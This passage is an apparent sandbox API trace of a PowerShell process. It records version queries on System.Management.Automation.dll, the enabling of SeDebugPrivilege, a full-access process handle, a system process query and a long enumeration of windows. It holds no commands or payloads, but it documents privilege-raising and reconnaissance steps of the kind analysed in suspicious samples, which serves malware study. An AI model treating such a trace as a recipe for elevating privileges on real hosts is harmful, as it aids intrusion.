lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0127.119] GetLastError () returned 0x2 [0127.119] GetVersionExW (in: lpVersionInformation=0x3383a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3383a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0127.119] GetLastError () returned 0x2 [0127.120] SetErrorMode (uMode=0x1) returned 0x1 [0127.121] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24e778 | out: lpFileInformation=0x24e778*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0127.121] GetLastError () returned 0x2 [0127.121] SetErrorMode (uMode=0x1) returned 0x1 [0127.167] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24e7fc | out: lpdwHandle=0x24e7fc) returned 0x94c [0127.169] GetLastError () returned 0x0 [0127.170] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b34d8c | out: lpData=0x2b34d8c) returned 1 [0127.260] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24e7c8, puLen=0x24e7c4 | out: lplpBuffer=0x24e7c8*=0x2b34e28, puLen=0x24e7c4) returned 1 [0127.261] lstrlenW (lpString="䅁") returned 1 [0127.388] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x2b34f04, puLen=0x24e740) returned 1 [0127.388] lstrlenW (lpString="Microsoft Corporation") returned 21 [0127.389] lstrcpyW (in: lpString1=0x338390, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0127.389] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x2b34f58, puLen=0x24e740) returned 1 [0127.389] lstrlenW (lpString="System.Management.Automation") returned 28 [0127.389] lstrcpyW (in: lpString1=0x338390, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0127.389] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x2b34fb4, puLen=0x24e740) returned 1 [0127.389] lstrlenW (lpString="6.1.7601.17514") returned 14 [0127.390] lstrcpyW (in: lpString1=0x338390, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0127.390] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x2b34ff4, puLen=0x24e740) returned 1 [0127.390] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0127.390] lstrcpyW (in: lpString1=0x338390, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0127.390] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x2b3505c, puLen=0x24e740) returned 1 [0127.390] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0127.390] lstrcpyW (in: lpString1=0x338390, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0127.390] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x2b350f8, puLen=0x24e740) returned 1 [0127.390] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0127.390] lstrcpyW (in: lpString1=0x338390, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0127.390] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x2b3515c, puLen=0x24e740) returned 1 [0127.390] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0127.390] lstrcpyW (in: lpString1=0x338390, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0127.390] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x2b351d8, puLen=0x24e740) returned 1 [0127.390] lstrlenW (lpString="6.1.7601.17514") returned 14 [0127.390] lstrcpyW (in: lpString1=0x338390, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0127.390] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x2b34e80, puLen=0x24e740) returned 1 [0127.390] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0127.390] lstrcpyW (in: lpString1=0x338390, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0127.390] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x0, puLen=0x24e740) returned 0 [0127.390] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x0, puLen=0x24e740) returned 0 [0127.391] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24e744, puLen=0x24e740 | out: lplpBuffer=0x24e744*=0x0, puLen=0x24e740) returned 0 [0127.391] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24e738, puLen=0x24e734 | out: lplpBuffer=0x24e738*=0x2b34e28, puLen=0x24e734) returned 1 [0127.392] VerLanguageNameW (in: wLang=0x0, szLang=0x338390, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0127.392] VerQueryValueW (in: pBlock=0x2b34d8c, lpSubBlock="\\", lplpBuffer=0x24e74c, puLen=0x24e748 | out: lplpBuffer=0x24e74c*=0x2b34db4, puLen=0x24e748) returned 1 [0127.577] GetCurrentProcessId () returned 0x320 [0128.498] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24df84 | out: lpLuid=0x24df84*(LowPart=0x14, HighPart=0)) returned 1 [0128.500] GetLastError () returned 0x0 [0128.501] GetCurrentProcess () returned 0xffffffff [0128.501] GetLastError () returned 0x0 [0128.502] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x24df80 | out: TokenHandle=0x24df80*=0x308) returned 1 [0128.502] GetLastError () returned 0x0 [0128.549] AdjustTokenPrivileges (in: TokenHandle=0x308, DisableAllPrivileges=0, NewState=0x2b378cc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0128.549] GetLastError () returned 0x514 [0128.550] CloseHandle (hObject=0x308) returned 1 [0128.550] GetLastError () returned 0x514 [0128.636] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x320) returned 0x308 [0128.636] GetLastError () returned 0x514 [0128.645] EnumProcessModules (in: hProcess=0x308, lphModule=0x2b37910, cb=0x100, lpcbNeeded=0x24e774 | out: lphModule=0x2b37910, lpcbNeeded=0x24e774) returned 1 [0128.646] GetLastError () returned 0x514 [0128.790] GetModuleInformation (in: hProcess=0x308, hModule=0x221c0000, lpmodinfo=0x2b37a50, cb=0xc | out: lpmodinfo=0x2b37a50*(lpBaseOfDll=0x221c0000, SizeOfImage=0x72000, EntryPoint=0x221c7363)) returned 1 [0128.790] GetLastError () returned 0x514 [0128.792] GetModuleBaseNameW (in: hProcess=0x308, hModule=0x221c0000, lpBaseName=0x338b50, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0128.792] GetLastError () returned 0x514 [0128.793] GetModuleFileNameExW (in: hProcess=0x308, hModule=0x221c0000, lpFilename=0x338b50, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0128.794] GetLastError () returned 0x514 [0128.794] CloseHandle (hObject=0x308) returned 1 [0128.794] GetLastError () returned 0x514 [0129.040] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x320) returned 0x308 [0129.040] GetLastError () returned 0x514 [0129.042] GetExitCodeProcess (in: hProcess=0x308, lpExitCode=0x2b36f00 | out: lpExitCode=0x2b36f00*=0x103) returned 1 [0129.042] GetLastError () returned 0x514 [0129.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3b35278, Length=0x20000, ResultLength=0x24e7bc | out: SystemInformation=0x3b35278, ResultLength=0x24e7bc*=0xb808) returned 0x0 [0129.388] EnumWindows (lpEnumFunc=0x2af3612, lParam=0x0) returned 1 [0129.390] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5fc [0129.390] GetLastError () returned 0x514 [0129.390] GetWindowThreadProcessId (in: hWnd=0x1013c, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x69c [0129.390] GetLastError () returned 0x514 [0129.390] GetWindowThreadProcessId (in: hWnd=0x200d0, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.390] GetLastError () returned 0x514 [0129.390] GetWindowThreadProcessId (in: hWnd=0x200d8, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.390] GetLastError () returned 0x514 [0129.390] GetWindowThreadProcessId (in: hWnd=0x200e2, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.390] GetLastError () returned 0x514 [0129.391] GetWindowThreadProcessId (in: hWnd=0x200e8, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.391] GetLastError () returned 0x514 [0129.391] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.391] GetLastError () returned 0x514 [0129.391] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.391] GetLastError () returned 0x514 [0129.391] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.391] GetLastError () returned 0x514 [0129.391] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.391] GetLastError () returned 0x514 [0129.392] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.392] GetLastError () returned 0x514 [0129.392] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.392] GetLastError () returned 0x514 [0129.392] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.392] GetLastError () returned 0x514 [0129.392] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.392] GetLastError () returned 0x514 [0129.392] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.392] GetLastError () returned 0x514 [0129.393] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x464 [0129.393] GetLastError () returned 0x514 [0129.393] GetWindowThreadProcessId (in: hWnd=0x5009c, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.393] GetLastError () returned 0x514 [0129.393] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.393] GetLastError () returned 0x514 [0129.393] GetWindowThreadProcessId (in: hWnd=0xb0114, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x6a4 [0129.393] GetLastError () returned 0x514 [0129.393] GetWindowThreadProcessId (in: hWnd=0x6021a, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x9b0 [0129.393] GetLastError () returned 0x514 [0129.393] GetWindowThreadProcessId (in: hWnd=0x201c4, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x94c [0129.394] GetLastError () returned 0x514 [0129.394] GetWindowThreadProcessId (in: hWnd=0x20214, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x8fc [0129.394] GetLastError () returned 0x514 [0129.394] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x94c [0129.394] GetLastError () returned 0x514 [0129.394] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x94c [0129.394] GetLastError () returned 0x514 [0129.394] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x94c [0129.394] GetLastError () returned 0x514 [0129.394] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x94c [0129.395] GetLastError () returned 0x514 [0129.395] GetWindowThreadProcessId (in: hWnd=0x501b2, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x988 [0129.395] GetLastError () returned 0x514 [0129.395] GetWindowThreadProcessId (in: hWnd=0x201cc, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x94c [0129.395] GetLastError () returned 0x514 [0129.395] GetWindowThreadProcessId (in: hWnd=0x201bc, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x94c [0129.395] GetLastError () returned 0x514 [0129.395] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x890 [0129.395] GetLastError () returned 0x514 [0129.395] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x880 [0129.395] GetLastError () returned 0x514 [0129.396] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x870 [0129.396] GetLastError () returned 0x514 [0129.396] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x860 [0129.431] GetLastError () returned 0x514 [0129.431] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x850 [0129.431] GetLastError () returned 0x514 [0129.431] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x840 [0129.432] GetLastError () returned 0x514 [0129.432] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x830 [0129.432] GetLastError () returned 0x514 [0129.432] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x820 [0129.432] GetLastError () returned 0x514 [0129.432] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x810 [0129.432] GetLastError () returned 0x514 [0129.432] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x768 [0129.432] GetLastError () returned 0x514 [0129.432] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x364 [0129.432] GetLastError () returned 0x514 [0129.432] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x3f0 [0129.432] GetLastError () returned 0x514 [0129.432] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x6bc [0129.432] GetLastError () returned 0x514 [0129.433] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x23c [0129.433] GetLastError () returned 0x514 [0129.433] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x578 [0129.433] GetLastError () returned 0x514 [0129.433] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x57c [0129.433] GetLastError () returned 0x514 [0129.433] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4b4 [0129.433] GetLastError () returned 0x514 [0129.433] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x764 [0129.433] GetLastError () returned 0x514 [0129.433] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x120 [0129.433] GetLastError () returned 0x514 [0129.433] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x64c [0129.433] GetLastError () returned 0x514 [0129.433] GetWindowThreadProcessId (in: hWnd=0x30110, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x1c4 [0129.434] GetLastError () returned 0x514 [0129.434] GetWindowThreadProcessId (in: hWnd=0x20120, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x210 [0129.434] GetLastError () returned 0x514 [0129.434] GetWindowThreadProcessId (in: hWnd=0x9009e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x7f8 [0129.434] GetLastError () returned 0x514 [0129.434] GetWindowThreadProcessId (in: hWnd=0x20162, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5c0 [0129.434] GetLastError () returned 0x514 [0129.434] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5fc [0129.434] GetLastError () returned 0x514 [0129.434] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5ec [0129.434] GetLastError () returned 0x514 [0129.434] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5fc [0129.434] GetLastError () returned 0x514 [0129.434] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5ec [0129.434] GetLastError () returned 0x514 [0129.435] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5fc [0129.435] GetLastError () returned 0x514 [0129.435] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5c0 [0129.435] GetLastError () returned 0x514 [0129.435] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5c0 [0129.435] GetLastError () returned 0x514 [0129.435] GetWindowThreadProcessId (in: hWnd=0x200e4, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.435] GetLastError () returned 0x514 [0129.435] GetWindowThreadProcessId (in: hWnd=0x300bc, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.435] GetLastError () returned 0x514 [0129.435] GetWindowThreadProcessId (in: hWnd=0x300aa, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.435] GetLastError () returned 0x514 [0129.435] GetWindowThreadProcessId (in: hWnd=0x200b8, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.435] GetLastError () returned 0x514 [0129.436] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.436] GetLastError () returned 0x514 [0129.436] GetWindowThreadProcessId (in: hWnd=0x300c4, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.436] GetLastError () returned 0x514 [0129.436] GetWindowThreadProcessId (in: hWnd=0x800a2, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.436] GetLastError () returned 0x514 [0129.436] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x594 [0129.436] GetLastError () returned 0x514 [0129.436] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x730 [0129.436] GetLastError () returned 0x514 [0129.436] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x5b8 [0129.436] GetLastError () returned 0x514 [0129.436] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x464 [0129.436] GetLastError () returned 0x514 [0129.436] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x58c [0129.437] GetLastError () returned 0x514 [0129.437] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.437] GetLastError () returned 0x514 [0129.437] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x550 [0129.437] GetLastError () returned 0x514 [0129.437] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.437] GetLastError () returned 0x514 [0129.437] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.437] GetLastError () returned 0x514 [0129.437] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.437] GetLastError () returned 0x514 [0129.437] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x528 [0129.437] GetLastError () returned 0x514 [0129.437] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x614 [0129.437] GetLastError () returned 0x514 [0129.438] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.438] GetLastError () returned 0x514 [0129.438] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4f0 [0129.438] GetLastError () returned 0x514 [0129.438] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.438] GetLastError () returned 0x514 [0129.438] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x464 [0129.438] GetLastError () returned 0x514 [0129.438] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x464 [0129.438] GetLastError () returned 0x514 [0129.438] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x454 [0129.438] GetLastError () returned 0x514 [0129.438] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x7f4 [0129.438] GetLastError () returned 0x514 [0129.439] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x464 [0129.439] GetLastError () returned 0x514 [0129.439] GetWindowThreadProcessId (in: hWnd=0x1013e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x69c [0129.439] GetLastError () returned 0x514 [0129.439] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.439] GetLastError () returned 0x514 [0129.439] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x4a4 [0129.439] GetLastError () returned 0x514 [0129.439] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x6b8 [0129.439] GetLastError () returned 0x514 [0129.439] GetWindowThreadProcessId (in: hWnd=0x1401b0, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x9b0 [0129.439] GetLastError () returned 0x514 [0129.439] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x94c [0129.439] GetLastError () returned 0x514 [0129.439] GetWindowThreadProcessId (in: hWnd=0x201b6, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x94c [0129.439] GetLastError () returned 0x514 [0129.439] GetWindowThreadProcessId (in: hWnd=0x20216, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x570 [0129.440] GetLastError () returned 0x514 [0129.440] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x890 [0129.440] GetLastError () returned 0x514 [0129.440] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x880 [0129.440] GetLastError () returned 0x514 [0129.440] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x870 [0129.440] GetLastError () returned 0x514 [0129.440] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x860 [0129.440] GetLastError () returned 0x514 [0129.440] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x24e410 | out: lpdwProcessId=0x24e410) returned 0x850 [0129.440] GetLastError () returned 0x514 [0129.440] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x24e410 | out: 